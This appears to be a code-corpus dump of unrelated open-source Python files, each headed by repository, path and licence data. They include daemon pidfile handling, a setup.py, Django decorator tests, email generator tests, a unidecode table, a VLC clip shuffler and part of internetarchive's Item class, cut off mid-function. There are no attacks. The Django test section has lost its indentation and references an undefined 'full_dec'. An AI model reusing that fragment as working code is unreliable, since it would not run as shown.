    # the lock.  NOTE(review): these asserts are stripped under -O.
    flags = fcntl.fcntl(fd, fcntl.F_GETFD)
    assert flags != -1
    flags |= fcntl.FD_CLOEXEC
    r = fcntl.fcntl(fd, fcntl.F_SETFD, flags)
    assert r != -1
    # There is no platform independent way to implement fcntl(fd, F_SETLK, &fl)
    # via fcntl.fcntl. So use lockf instead
    try:
        fcntl.lockf(fd, fcntl.LOCK_EX | fcntl.LOCK_NB, 0, 0, os.SEEK_SET)
    except IOError:
        # Lock held by a live daemon: report its pid if the file has one.
        r = os.read(fd, 32)
        if r:
            logging.error('already started at pid %s' % common.to_str(r))
        else:
            logging.error('already started')
        os.close(fd)
        return -1
    # We own the lock; replace any stale content with our own pid.
    os.ftruncate(fd, 0)
    os.write(fd, common.to_bytes(str(pid)))
    return 0
def freopen(f, mode, stream):
    """Redirect *stream*'s underlying file descriptor to the file *f*,
    mimicking C's freopen(3).

    The file is opened with *mode* and its descriptor is duplicated over
    stream's descriptor, so subsequent writes to *stream* land in *f*.
    """
    replacement = open(f, mode)
    target_fd = stream.fileno()
    os.close(target_fd)
    os.dup2(replacement.fileno(), target_fd)
def daemon_start(pid_file, log_file):
    """Daemonize the current process.

    Forks once; the parent waits (at most 5s) to be signalled by the
    child: SIGTERM means successful startup (parent exits 0), SIGINT
    means failure (parent exits 1).  The child becomes a session leader,
    writes and locks *pid_file*, and redirects stdout/stderr to
    *log_file*.
    """
    def handle_exit(signum, _):
        # Parent-side handler: exit status reflects which signal arrived.
        if signum == signal.SIGTERM:
            sys.exit(0)
        sys.exit(1)

    signal.signal(signal.SIGINT, handle_exit)
    signal.signal(signal.SIGTERM, handle_exit)

    # fork only once because we are sure parent will exit
    pid = os.fork()
    assert pid != -1

    if pid > 0:
        # parent waits for its child to signal success/failure
        time.sleep(5)
        sys.exit(0)

    # child signals its parent to exit
    ppid = os.getppid()
    pid = os.getpid()
    if write_pid_file(pid_file, pid) != 0:
        os.kill(ppid, signal.SIGINT)
        sys.exit(1)

    os.setsid()
    signal.signal(signal.SIGHUP, signal.SIG_IGN)

    print('started')
    os.kill(ppid, signal.SIGTERM)

    sys.stdin.close()
    try:
        freopen(log_file, 'a', sys.stdout)
        freopen(log_file, 'a', sys.stderr)
    except IOError as e:
        shell.print_exception(e)
        sys.exit(1)
def daemon_stop(pid_file):
    """Stop the daemon whose pid is recorded in *pid_file*.

    Sends SIGTERM to the recorded pid, waits up to 10 seconds for the
    process to disappear, then removes the pid file.  A missing or empty
    pid file and an already-dead process are treated as "not running" and
    return quietly; unexpected I/O errors or a timeout exit the process
    with status 1.
    """
    import errno
    try:
        with open(pid_file) as f:
            buf = f.read()
            pid = common.to_str(buf)
            if not buf:
                logging.error('not running')
                # BUGFIX: previously fell through to int('') below, which
                # raised ValueError.  An empty pid file means not running.
                return
    except IOError as e:
        shell.print_exception(e)
        if e.errno == errno.ENOENT:
            # always exit 0 if we are sure daemon is not running
            logging.error('not running')
            return
        sys.exit(1)
    pid = int(pid)
    if pid > 0:
        try:
            os.kill(pid, signal.SIGTERM)
        except OSError as e:
            if e.errno == errno.ESRCH:
                logging.error('not running')
                # always exit 0 if we are sure daemon is not running
                return
            shell.print_exception(e)
            sys.exit(1)
    else:
        logging.error('pid is not positive: %d', pid)

    # sleep for maximum 10s while polling for the pid to disappear
    for i in range(0, 200):
        try:
            # query for the pid (signal 0 only checks existence)
            os.kill(pid, 0)
        except OSError as e:
            if e.errno == errno.ESRCH:
                break
        time.sleep(0.05)
    else:
        logging.error('timed out when stopping pid %d', pid)
        sys.exit(1)
    print('stopped')
    os.unlink(pid_file)
def set_user(username):
    """Drop privileges to *username*.

    No-op when *username* is None or already the current user.  Raises
    KeyError when the user does not exist; the setgid/setuid calls raise
    when the caller lacks permission (i.e. is not root).
    """
    if username is None:
        return
    import pwd
    import grp
    try:
        pwrec = pwd.getpwnam(username)
    except KeyError:
        logging.error('user not found: %s' % username)
        raise
    user = pwrec[0]
    uid = pwrec[2]
    gid = pwrec[3]
    running_uid = os.getuid()
    if uid == running_uid:
        return
    if running_uid != 0:
        logging.error('can not set user as nonroot user')
        # will raise later (the os.setgid/os.setuid calls below fail)
    # inspired by supervisor: install the supplementary groups before
    # dropping the primary gid and uid.
    if hasattr(os, 'setgroups'):
        supplemental = [entry[2] for entry in grp.getgrall() if user in entry[3]]
        supplemental.insert(0, gid)
        os.setgroups(supplemental)
    os.setgid(gid)
    os.setuid(uid)
| apache-2.0 |
jmbarbier/rst2code | setup.py | 1 | 1112 | import os
from distutils.core import setup
from setuptools import find_packages
# Load __version__ from version.py into this namespace.
# NOTE(review): exec on a local file is the conventional setup.py pattern,
# but it runs whatever code version.py contains.
with open('version.py') as f: exec(f.read())

# Trove classifiers describing the package on PyPI.
CLASSIFIERS = [
    'Development Status :: 5 - Production/Stable',
    'Environment :: Console',
    'Intended Audience :: Developers',
    'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)',
    'Operating System :: OS Independent',
    'Programming Language :: Python',
    'Topic :: Documentation',
    'Topic :: Software Development',
    'Topic :: Text Processing :: Markup'
]

# Runtime dependencies installed alongside the package.
INSTALL_REQUIRES = [
    "Pygments>=1.6",
    "Sphinx>=1.1.3",
    "docutils>=0.11"
]

setup(
    name = "rst2code",
    description = "reStructuredText literate programming tool",
    classifiers = CLASSIFIERS,
    install_requires = INSTALL_REQUIRES,
    version = __version__,
    author = "Jean-Matthieu BARBIER",
    author_email = "jm.barbier@solidev.net",
    url="https://github.com/jmbarbier/rst2code",
    download_url="https://github.com/jmbarbier/rst2code/archive/v"+__version__+".tar.gz",
    py_modules = ["rst2code", "version"],
    scripts = ["rst2code.py"]
)
| gpl-3.0 |
ABaldwinHunter/django-clone-classic | tests/utils_tests/test_decorators.py | 319 | 4870 | from django.http import HttpResponse
from django.template import engines
from django.template.response import TemplateResponse
from django.test import RequestFactory, SimpleTestCase
from django.utils.decorators import classproperty, decorator_from_middleware
class ProcessViewMiddleware(object):
    """Middleware implementing only the process_view hook (a no-op)."""
    def process_view(self, request, view_func, view_args, view_kwargs):
        pass

# Decorator built from the middleware above, applied both to a plain view
# function and to a callable class instance.
process_view_dec = decorator_from_middleware(ProcessViewMiddleware)

@process_view_dec
def process_view(request):
    return HttpResponse()

class ClassProcessView(object):
    """Callable class acting as a view, used to decorate an instance."""
    def __call__(self, request):
        return HttpResponse()

class_process_view = process_view_dec(ClassProcessView())
class FullMiddleware(object):
    """Middleware exercising every hook; each phase stamps a flag on the
    request so tests can check which phases ran."""

    @staticmethod
    def _mark(request, attribute):
        # Record that a middleware phase was reached.
        setattr(request, attribute, True)

    def process_request(self, request):
        self._mark(request, 'process_request_reached')

    def process_view(self, request, view_func, view_args, view_kwargs):
        self._mark(request, 'process_view_reached')

    def process_template_response(self, request, response):
        self._mark(request, 'process_template_response_reached')
        return response

    def process_response(self, request, response):
        # This should never receive unrendered content.
        request.process_response_content = response.content
        self._mark(request, 'process_response_reached')
        return response
class DecoratorFromMiddlewareTests(SimpleTestCase):
"""
Tests for view decorators created using
``django.utils.decorators.decorator_from_middleware``.
"""
rf = RequestFactory()
def test_process_view_middleware(self):
"""
Test a middleware that implements process_view.
"""
process_view(self.rf.get('/'))
def test_callable_process_view_middleware(self):
"""
Test a middleware that implements process_view, operating on a callable class.
"""
class_process_view(self.rf.get('/'))
def test_full_dec_normal(self):
"""
Test that all methods of middleware are called for normal HttpResponses
"""
@full_dec
def normal_view(request):
template = engines['django'].from_string("Hello world")
return HttpResponse(template.render())
request = self.rf.get('/')
normal_view(request)
self.assertTrue(getattr(request, 'process_request_reached', False))
self.assertTrue(getattr(request, 'process_view_reached', False))
# process_template_response must not be called for HttpResponse
self.assertFalse(getattr(request, 'process_template_response_reached', False))
self.assertTrue(getattr(request, 'process_response_reached', False))
def test_full_dec_templateresponse(self):
"""
Test that all methods of middleware are called for TemplateResponses in
the right sequence.
"""
@full_dec
def template_response_view(request):
template = engines['django'].from_string("Hello world")
return TemplateResponse(request, template)
request = self.rf.get('/')
response = template_response_view(request)
self.assertTrue(getattr(request, 'process_request_reached', False))
self.assertTrue(getattr(request, 'process_view_reached', False))
self.assertTrue(getattr(request, 'process_template_response_reached', False))
# response must not be rendered yet.
self.assertFalse(response._is_rendered)
# process_response must not be called until after response is rendered,
# otherwise some decorators like csrf_protect and gzip_page will not
# work correctly. See #16004
self.assertFalse(getattr(request, 'process_response_reached', False))
response.render()
self.assertTrue(getattr(request, 'process_response_reached', False))
# Check that process_response saw the rendered content
self.assertEqual(request.process_response_content, b"Hello world")
class ClassPropertyTest(SimpleTestCase):
    """Tests for ``django.utils.decorators.classproperty``."""

    def test_getter(self):
        # classproperty reads the *class* attribute even when an instance
        # attribute of the same name shadows it.
        class Foo(object):
            foo_attr = 123
            def __init__(self):
                self.foo_attr = 456
            @classproperty
            def foo(cls):
                return cls.foo_attr

        # The getter can also be attached after construction via .getter().
        class Bar(object):
            bar = classproperty()
            @bar.getter
            def bar(cls):
                return 123

        self.assertEqual(Foo.foo, 123)
        self.assertEqual(Foo().foo, 123)
        self.assertEqual(Bar.bar, 123)
        self.assertEqual(Bar().bar, 123)

    def test_override_getter(self):
        # A later .getter() call replaces the original getter.
        class Foo(object):
            @classproperty
            def foo(cls):
                return 123
            @foo.getter
            def foo(cls):
                return 456

        self.assertEqual(Foo.foo, 456)
        self.assertEqual(Foo().foo, 456)
mancoast/CPythonPyc_test | fail/340_test_generator.py | 118 | 7616 | import io
import textwrap
import unittest
from email import message_from_string, message_from_bytes
from email.generator import Generator, BytesGenerator
from email import policy
from test.test_email import TestEmailBase, parameterize
@parameterize
class TestGeneratorBase:
    """Shared generator tests; subclasses supply msgfunc, genclass, ioclass
    and typ to run them over str (Generator) or bytes (BytesGenerator)."""

    policy = policy.default

    def msgmaker(self, msg, policy=None):
        # Parse *msg* with the subclass' message factory under *policy*.
        policy = self.policy if policy is None else policy
        return self.msgfunc(msg, policy=policy)

    # Expected flattened output keyed by maximum header line length
    # (0 means "no limit").
    refold_long_expected = {
        0: textwrap.dedent("""\
To: whom_it_may_concern@example.com
From: nobody_you_want_to_know@example.com
Subject: We the willing led by the unknowing are doing the
impossible for the ungrateful. We have done so much for so long with so little
we are now qualified to do anything with nothing.
None
"""),
        # From is wrapped because wrapped it fits in 40.
        40: textwrap.dedent("""\
To: whom_it_may_concern@example.com
From:
nobody_you_want_to_know@example.com
Subject: We the willing led by the
unknowing are doing the impossible for
the ungrateful. We have done so much
for so long with so little we are now
qualified to do anything with nothing.
None
"""),
        # Neither to nor from fit even if put on a new line,
        # so we leave them sticking out on the first line.
        20: textwrap.dedent("""\
To: whom_it_may_concern@example.com
From: nobody_you_want_to_know@example.com
Subject: We the
willing led by the
unknowing are doing
the impossible for
the ungrateful. We
have done so much
for so long with so
little we are now
qualified to do
anything with
nothing.
None
"""),
    }
    refold_long_expected[100] = refold_long_expected[0]

    # With refold_source='all' the already-folded source headers are
    # refolded too, so the unlimited/100-column expectations differ.
    refold_all_expected = refold_long_expected.copy()
    refold_all_expected[0] = (
        "To: whom_it_may_concern@example.com\n"
        "From: nobody_you_want_to_know@example.com\n"
        "Subject: We the willing led by the unknowing are doing the "
        "impossible for the ungrateful. We have done so much for "
        "so long with so little we are now qualified to do anything "
        "with nothing.\n"
        "\n"
        "None\n")
    refold_all_expected[100] = (
        "To: whom_it_may_concern@example.com\n"
        "From: nobody_you_want_to_know@example.com\n"
        "Subject: We the willing led by the unknowing are doing the "
        "impossible for the ungrateful. We have\n"
        " done so much for so long with so little we are now qualified "
        "to do anything with nothing.\n"
        "\n"
        "None\n")

    # Parameter values for the length_* parameterized tests below.
    length_params = [n for n in refold_long_expected]

    def length_as_maxheaderlen_parameter(self, n):
        msg = self.msgmaker(self.typ(self.refold_long_expected[0]))
        s = self.ioclass()
        g = self.genclass(s, maxheaderlen=n, policy=self.policy)
        g.flatten(msg)
        self.assertEqual(s.getvalue(), self.typ(self.refold_long_expected[n]))

    def length_as_max_line_length_policy(self, n):
        msg = self.msgmaker(self.typ(self.refold_long_expected[0]))
        s = self.ioclass()
        g = self.genclass(s, policy=self.policy.clone(max_line_length=n))
        g.flatten(msg)
        self.assertEqual(s.getvalue(), self.typ(self.refold_long_expected[n]))

    def length_as_maxheaderlen_parm_overrides_policy(self, n):
        # The explicit constructor argument wins over the policy setting.
        msg = self.msgmaker(self.typ(self.refold_long_expected[0]))
        s = self.ioclass()
        g = self.genclass(s, maxheaderlen=n,
                          policy=self.policy.clone(max_line_length=10))
        g.flatten(msg)
        self.assertEqual(s.getvalue(), self.typ(self.refold_long_expected[n]))

    def length_as_max_line_length_with_refold_none_does_not_fold(self, n):
        msg = self.msgmaker(self.typ(self.refold_long_expected[0]))
        s = self.ioclass()
        g = self.genclass(s, policy=self.policy.clone(refold_source='none',
                                                      max_line_length=n))
        g.flatten(msg)
        self.assertEqual(s.getvalue(), self.typ(self.refold_long_expected[0]))

    def length_as_max_line_length_with_refold_all_folds(self, n):
        msg = self.msgmaker(self.typ(self.refold_long_expected[0]))
        s = self.ioclass()
        g = self.genclass(s, policy=self.policy.clone(refold_source='all',
                                                      max_line_length=n))
        g.flatten(msg)
        self.assertEqual(s.getvalue(), self.typ(self.refold_all_expected[n]))

    def test_crlf_control_via_policy(self):
        # policy.SMTP forces CRLF line endings.
        source = "Subject: test\r\n\r\ntest body\r\n"
        expected = source
        msg = self.msgmaker(self.typ(source))
        s = self.ioclass()
        g = self.genclass(s, policy=policy.SMTP)
        g.flatten(msg)
        self.assertEqual(s.getvalue(), self.typ(expected))

    def test_flatten_linesep_overrides_policy(self):
        # An explicit linesep argument to flatten() wins over the policy.
        source = "Subject: test\n\ntest body\n"
        expected = source
        msg = self.msgmaker(self.typ(source))
        s = self.ioclass()
        g = self.genclass(s, policy=policy.SMTP)
        g.flatten(msg, linesep='\n')
        self.assertEqual(s.getvalue(), self.typ(expected))
class TestGenerator(TestGeneratorBase, TestEmailBase):
    """Run the shared generator tests over text (str) output."""
    msgfunc = staticmethod(message_from_string)
    genclass = Generator
    ioclass = io.StringIO
    typ = str
class TestBytesGenerator(TestGeneratorBase, TestEmailBase):
    """Run the shared generator tests over binary (bytes) output."""
    msgfunc = staticmethod(message_from_bytes)
    genclass = BytesGenerator
    ioclass = io.BytesIO
    typ = lambda self, x: x.encode('ascii')

    def test_cte_type_7bit_handles_unknown_8bit(self):
        # Non-ASCII header bytes must be downgraded to an encoded word
        # using the unknown-8bit charset when cte_type is 7bit.
        source = ("Subject: Maintenant je vous présente mon "
                  "collègue\n\n").encode('utf-8')
        expected = ('Subject: Maintenant je vous =?unknown-8bit?q?'
                    'pr=C3=A9sente_mon_coll=C3=A8gue?=\n\n').encode('ascii')
        msg = message_from_bytes(source)
        s = io.BytesIO()
        g = BytesGenerator(s, policy=self.policy.clone(cte_type='7bit'))
        g.flatten(msg)
        self.assertEqual(s.getvalue(), expected)

    def test_cte_type_7bit_transforms_8bit_cte(self):
        # An 8bit body must be re-encoded as quoted-printable when the
        # output is restricted to 7bit.
        source = textwrap.dedent("""\
From: foo@bar.com
To: Dinsdale
Subject: Nudge nudge, wink, wink
Mime-Version: 1.0
Content-Type: text/plain; charset="latin-1"
Content-Transfer-Encoding: 8bit
oh là là, know what I mean, know what I mean?
""").encode('latin1')
        msg = message_from_bytes(source)
        expected = textwrap.dedent("""\
From: foo@bar.com
To: Dinsdale
Subject: Nudge nudge, wink, wink
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
oh l=E0 l=E0, know what I mean, know what I mean?
""").encode('ascii')
        s = io.BytesIO()
        g = BytesGenerator(s, policy=self.policy.clone(cte_type='7bit',
                                                       linesep='\n'))
        g.flatten(msg)
        self.assertEqual(s.getvalue(), expected)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
| gpl-3.0 |
mnahm5/django-estore | Lib/site-packages/unidecode/x021.py | 62 | 3964 | data = (
    # ASCII transliteration for Unicode block U+21xx (letterlike symbols,
    # roman numerals, arrows); '[?]' marks characters with no mapping.
    '', # 0x00
    '', # 0x01
    'C', # 0x02
    '', # 0x03
    '', # 0x04
    '', # 0x05
    '', # 0x06
    '', # 0x07
    '', # 0x08
    '', # 0x09
    '', # 0x0a
    '', # 0x0b
    '', # 0x0c
    'H', # 0x0d
    '', # 0x0e
    '', # 0x0f
    '', # 0x10
    '', # 0x11
    '', # 0x12
    '', # 0x13
    '', # 0x14
    'N', # 0x15
    '', # 0x16
    '', # 0x17
    '', # 0x18
    'P', # 0x19
    'Q', # 0x1a
    '', # 0x1b
    '', # 0x1c
    'R', # 0x1d
    '', # 0x1e
    '', # 0x1f
    '(sm)', # 0x20
    'TEL', # 0x21
    '(tm)', # 0x22
    '', # 0x23
    'Z', # 0x24
    '', # 0x25
    '', # 0x26
    '', # 0x27
    '', # 0x28
    '', # 0x29
    'K', # 0x2a
    'A', # 0x2b
    '', # 0x2c
    '', # 0x2d
    'e', # 0x2e
    'e', # 0x2f
    'E', # 0x30
    'F', # 0x31
    'F', # 0x32
    'M', # 0x33
    '', # 0x34
    '', # 0x35
    '', # 0x36
    '', # 0x37
    '', # 0x38
    '', # 0x39
    '', # 0x3a
    'FAX', # 0x3b
    '', # 0x3c
    '', # 0x3d
    '', # 0x3e
    '', # 0x3f
    '[?]', # 0x40
    '[?]', # 0x41
    '[?]', # 0x42
    '[?]', # 0x43
    '[?]', # 0x44
    'D', # 0x45
    'd', # 0x46
    'e', # 0x47
    'i', # 0x48
    'j', # 0x49
    '[?]', # 0x4a
    '[?]', # 0x4b
    '[?]', # 0x4c
    '[?]', # 0x4d
    'F', # 0x4e
    '[?]', # 0x4f
    '[?]', # 0x50
    '[?]', # 0x51
    '[?]', # 0x52
    ' 1/3 ', # 0x53
    ' 2/3 ', # 0x54
    ' 1/5 ', # 0x55
    ' 2/5 ', # 0x56
    ' 3/5 ', # 0x57
    ' 4/5 ', # 0x58
    ' 1/6 ', # 0x59
    ' 5/6 ', # 0x5a
    ' 1/8 ', # 0x5b
    ' 3/8 ', # 0x5c
    ' 5/8 ', # 0x5d
    ' 7/8 ', # 0x5e
    ' 1/', # 0x5f
    'I', # 0x60
    'II', # 0x61
    'III', # 0x62
    'IV', # 0x63
    'V', # 0x64
    'VI', # 0x65
    'VII', # 0x66
    'VIII', # 0x67
    'IX', # 0x68
    'X', # 0x69
    'XI', # 0x6a
    'XII', # 0x6b
    'L', # 0x6c
    'C', # 0x6d
    'D', # 0x6e
    'M', # 0x6f
    'i', # 0x70
    'ii', # 0x71
    'iii', # 0x72
    'iv', # 0x73
    'v', # 0x74
    'vi', # 0x75
    'vii', # 0x76
    'viii', # 0x77
    'ix', # 0x78
    'x', # 0x79
    'xi', # 0x7a
    'xii', # 0x7b
    'l', # 0x7c
    'c', # 0x7d
    'd', # 0x7e
    'm', # 0x7f
    '(D', # 0x80
    'D)', # 0x81
    '((|))', # 0x82
    ')', # 0x83
    '[?]', # 0x84
    '[?]', # 0x85
    '[?]', # 0x86
    '[?]', # 0x87
    '[?]', # 0x88
    '[?]', # 0x89
    '[?]', # 0x8a
    '[?]', # 0x8b
    '[?]', # 0x8c
    '[?]', # 0x8d
    '[?]', # 0x8e
    '[?]', # 0x8f
    '-', # 0x90
    '|', # 0x91
    '-', # 0x92
    '|', # 0x93
    '-', # 0x94
    '|', # 0x95
    '\\', # 0x96
    '/', # 0x97
    '\\', # 0x98
    '/', # 0x99
    '-', # 0x9a
    '-', # 0x9b
    '~', # 0x9c
    '~', # 0x9d
    '-', # 0x9e
    '|', # 0x9f
    '-', # 0xa0
    '|', # 0xa1
    '-', # 0xa2
    '-', # 0xa3
    '-', # 0xa4
    '|', # 0xa5
    '-', # 0xa6
    '|', # 0xa7
    '|', # 0xa8
    '-', # 0xa9
    '-', # 0xaa
    '-', # 0xab
    '-', # 0xac
    '-', # 0xad
    '-', # 0xae
    '|', # 0xaf
    '|', # 0xb0
    '|', # 0xb1
    '|', # 0xb2
    '|', # 0xb3
    '|', # 0xb4
    '|', # 0xb5
    '^', # 0xb6
    'V', # 0xb7
    '\\', # 0xb8
    '=', # 0xb9
    'V', # 0xba
    '^', # 0xbb
    '-', # 0xbc
    '-', # 0xbd
    '|', # 0xbe
    '|', # 0xbf
    '-', # 0xc0
    '-', # 0xc1
    '|', # 0xc2
    '|', # 0xc3
    '=', # 0xc4
    '|', # 0xc5
    '=', # 0xc6
    '=', # 0xc7
    '|', # 0xc8
    '=', # 0xc9
    '|', # 0xca
    '=', # 0xcb
    '=', # 0xcc
    '=', # 0xcd
    '=', # 0xce
    '=', # 0xcf
    '=', # 0xd0
    '|', # 0xd1
    '=', # 0xd2
    '|', # 0xd3
    '=', # 0xd4
    '|', # 0xd5
    '\\', # 0xd6
    '/', # 0xd7
    '\\', # 0xd8
    '/', # 0xd9
    '=', # 0xda
    '=', # 0xdb
    '~', # 0xdc
    '~', # 0xdd
    '|', # 0xde
    '|', # 0xdf
    '-', # 0xe0
    '|', # 0xe1
    '-', # 0xe2
    '|', # 0xe3
    '-', # 0xe4
    '-', # 0xe5
    '-', # 0xe6
    '|', # 0xe7
    '-', # 0xe8
    '|', # 0xe9
    '|', # 0xea
    '|', # 0xeb
    '|', # 0xec
    '|', # 0xed
    '|', # 0xee
    '|', # 0xef
    '-', # 0xf0
    '\\', # 0xf1
    '\\', # 0xf2
    '|', # 0xf3
    '[?]', # 0xf4
    '[?]', # 0xf5
    '[?]', # 0xf6
    '[?]', # 0xf7
    '[?]', # 0xf8
    '[?]', # 0xf9
    '[?]', # 0xfa
    '[?]', # 0xfb
    '[?]', # 0xfc
    '[?]', # 0xfd
    '[?]', # 0xfe
)
| mit |
niknow/vlc-random-videoclip | party.py | 1 | 1431 | import random
import time
import subprocess
import vlc
import os
# create list of all videos in folder 'videos'
subfolder = "videos"
videos = os.listdir(subfolder)
# NOTE(review): os.listdir may also return non-video entries (directories,
# hidden files); presumably the folder contains only playable clips -- confirm.

# specify clip length
intervall = 3  # seconds

# setup vlc instance
player = vlc.MediaPlayer()

try:
    print("Script running... press Ctrl+C to quit.")
    while True:
        # choose random file number
        n = random.randint(0, len(videos) - 1)
        # create path to current video file
        video = os.path.join(subfolder, videos[n])
        # get length of video n using ffprobe
        # NOTE(review): shell=True combined with a list argument behaves
        # differently across platforms (list-with-shell works as intended
        # on Windows only) -- confirm target platform.
        ffprobe = subprocess.check_output(['ffprobe', video],
                                          shell=True,
                                          stderr=subprocess.STDOUT)
        # calculate length of current video in seconds by locating the
        # "Duration: HH:MM:SS.ss" field in ffprobe's combined output
        i = ffprobe.find(bytes("Duration:", 'UTF-8'))
        duration = ffprobe[i + 9:i + 9 + 12].decode('UTF-8').strip().split(":")
        length = int(int(duration[0]) * 3600 +
                     int(duration[1]) * 60 +
                     float(duration[2])
                     )
        # create random position in video n
        # NOTE(review): raises ValueError when a clip is shorter than
        # 'intervall' (negative randint range) -- TODO guard against that.
        position = random.randint(0, length - intervall)
        # feed player with video and position
        player.set_mrl(video)
        player.play()
        player.set_time(position * 1000)  # VLC's set_time expects milliseconds
        # wait till next video
        time.sleep(intervall)
except KeyboardInterrupt:
    # Ctrl+C cleanly ends the loop.
    pass
| mit |
wumpus/internetarchive | internetarchive/item.py | 1 | 32339 | import os
import sys
from fnmatch import fnmatch
import logging
import time
from datetime import datetime
import requests.sessions
from requests.adapters import HTTPAdapter
from requests.exceptions import HTTPError
from requests import Response
from clint.textui import progress
import six
import six.moves.urllib as urllib
from . import __version__, session, iarequest, utils
log = logging.getLogger(__name__)
# Item class
# ________________________________________________________________________________________
class Item(object):
    """This class represents an archive.org item. You can use this
    class to access item metadata::

        >>> import internetarchive
        >>> item = internetarchive.Item('stairs')
        >>> print(item.metadata)

    Or to modify the metadata for an item::

        >>> metadata = dict(title='The Stairs')
        >>> item.modify(metadata)
        >>> print(item.metadata['title'])
        u'The Stairs'

    This class also uses IA's S3-like interface to upload files to an
    item. You need to supply your IAS3 credentials in environment
    variables in order to upload::

        >>> item.upload('myfile.tar', access_key='Y6oUrAcCEs4sK8ey',
        ...             secret_key='youRSECRETKEYzZzZ')
        True

    You can retrieve S3 keys here: `https://archive.org/account/s3.php
    <https://archive.org/account/s3.php>`__

    """

    # init()
    # ____________________________________________________________________________________
    def __init__(self, identifier, metadata_timeout=None, config=None, max_retries=1,
                 archive_session=None):
        """
        :type identifier: str
        :param identifier: The globally unique Archive.org identifier
                           for a given item.

        :type metadata_timeout: int
        :param metadata_timeout: (optional) Set a timeout for retrieving
                                 an item's metadata.

        :type config: dict
        :param config: (optional) Configuration options for the session.

        :type max_retries: int
        :param max_retries: (optional) Maximum number of times to request
                            a website if the connection drops. (default: 1)

        :type archive_session: :class:`ArchiveSession <ArchiveSession>`
        :param archive_session: (optional) An :class:`ArchiveSession
                                <ArchiveSession>` object to use instead
                                of building one from ``config``.

        """
        # Reuse a caller-supplied session when given; otherwise build one
        # from the (optional) config dict.
        self.session = archive_session if archive_session else session.get_session(config)
        self.protocol = 'https:' if self.session.secure else 'http:'
        self.http_session = requests.sessions.Session()
        # Retry dropped connections at the transport level.
        max_retries_adapter = HTTPAdapter(max_retries=max_retries)
        self.http_session.mount('{0}//'.format(self.protocol), max_retries_adapter)
        self.http_session.cookies = self.session.cookies

        self.identifier = identifier

        # Default empty attributes; most are overwritten by the Metadata
        # API response fetched in get_metadata() below.
        self.metadata = {}
        self.files = []
        self.created = None
        self.d1 = None
        self.d2 = None
        self.dir = None
        self.files_count = None
        self.item_size = None
        self.reviews = []
        self.server = None
        self.uniq = None
        self.updated = None
        self.tasks = None

        # get_metadata() also mirrors each top-level response key onto
        # ``self``, overwriting the defaults above when present.
        self._json = self.get_metadata(metadata_timeout)
        # An empty response means the item does not exist (yet).
        self.exists = False if self._json == {} else True
# __repr__()
# ____________________________________________________________________________________
def __repr__(self):
return ('Item(identifier={identifier!r}, '
'exists={exists!r})'.format(**self.__dict__))
    # get_metadata()
    # ____________________________________________________________________________________
    def get_metadata(self, metadata_timeout=None):
        """Get an item's metadata from the `Metadata API
        <http://blog.archive.org/2013/07/04/metadata-api/>`__

        :type metadata_timeout: int
        :param metadata_timeout: (optional) Timeout (in seconds) for the
                                 metadata request.

        :rtype: dict
        :returns: Metadata API response.

        :raises HTTPError: If the Metadata API responds with an error
                           status.
        """
        url = '{protocol}//archive.org/metadata/{identifier}'.format(**self.__dict__)
        try:
            resp = self.http_session.get(url, timeout=metadata_timeout)
            resp.raise_for_status()
        except HTTPError as e:
            error_msg = 'Error retrieving metadata from {0}, {1}'.format(resp.url, e)
            log.error(error_msg)
            if e.response.status_code == 503:
                # Back off briefly when the API reports it is overloaded
                # before re-raising.
                time.sleep(2.0)
            raise HTTPError(error_msg)
        metadata = resp.json()
        # Mirror each top-level metadata key as an attribute on self.
        for key in metadata:
            setattr(self, key, metadata[key])
        return metadata
# iter_files()
# ____________________________________________________________________________________
def iter_files(self):
"""Generator for iterating over files in an item.
:rtype: generator
:returns: A generator that yields :class:`internetarchive.File
<File>` objects.
"""
for file_dict in self.files:
file = File(self, file_dict.get('name'))
yield file
# file()
# ____________________________________________________________________________________
def get_file(self, file_name):
"""Get a :class:`File <File>` object for the named file.
:rtype: :class:`internetarchive.File <File>`
:returns: An :class:`internetarchive.File <File>` object.
"""
for f in self.iter_files():
if f.name == file_name:
return f
# get_files()
# ____________________________________________________________________________________
def get_files(self, files=None, source=None, formats=None, glob_pattern=None):
files = [] if not files else files
source = [] if not source else source
if not isinstance(files, (list, tuple, set)):
files = [files]
if not isinstance(source, (list, tuple, set)):
source = [source]
if not isinstance(formats, (list, tuple, set)):
formats = [formats]
file_objects = []
for f in self.iter_files():
if f.name in files:
file_objects.append(f)
elif f.source in source:
file_objects.append(f)
elif f.format in formats:
file_objects.append(f)
elif glob_pattern:
# Support for | operator.
patterns = glob_pattern.split('|')
if not isinstance(patterns, list):
patterns = [patterns]
for p in patterns:
if fnmatch(f.name, p):
file_objects.append(f)
return file_objects
    # download()
    # ____________________________________________________________________________________
    def download(self, concurrent=None, source=None, formats=None, glob_pattern=None,
                 dry_run=None, verbose=None, ignore_existing=None, checksum=None,
                 destdir=None, no_directory=None):
        """Download the entire item into the current working directory.

        :type concurrent: bool
        :param concurrent: Download files concurrently if ``True``
                           (requires gevent).

        :type source: str
        :param source: Only download files matching given source.

        :type formats: str
        :param formats: Only download files matching the given Formats.

        :type glob_pattern: str
        :param glob_pattern: Only download files matching the given glob
                             pattern

        :type dry_run: bool
        :param dry_run: Print the URLs that would be fetched instead of
                        downloading anything.

        :type verbose: bool
        :param verbose: Print progress to stdout.

        :type ignore_existing: bool
        :param ignore_existing: Overwrite local files if they already
                                exist.

        :type checksum: bool
        :param checksum: Skip downloading file based on checksum.

        :type destdir: str
        :param destdir: Directory to download files into, instead of the
                        current working directory.

        :type no_directory: bool
        :param no_directory: Download files to current working
                             directory rather than creating an item
                             directory.

        :rtype: bool
        :returns: True if if files have been downloaded successfully.
        """
        # Normalize all optional flags to concrete booleans.
        concurrent = False if concurrent is None else concurrent
        dry_run = False if dry_run is None else dry_run
        verbose = False if verbose is None else verbose
        ignore_existing = False if ignore_existing is None else ignore_existing
        checksum = False if checksum is None else checksum
        no_directory = False if no_directory is None else no_directory

        if verbose:
            sys.stdout.write('{0}:\n'.format(self.identifier))

        # NOTE(review): dark/nonexistent items are only warned about here;
        # execution still falls through to the download loop below (the
        # loop will simply find no files for a nonexistent item) --
        # confirm this fall-through is intentional.
        if self._json.get('is_dark') is True:
            sys.stdout.write(' skipping: item is dark.\n')
            log.warning('Not downloading item {0}, '
                        'item is dark'.format(self.identifier))
        elif self.metadata == {}:
            sys.stdout.write(' skipping: item does not exist.\n')
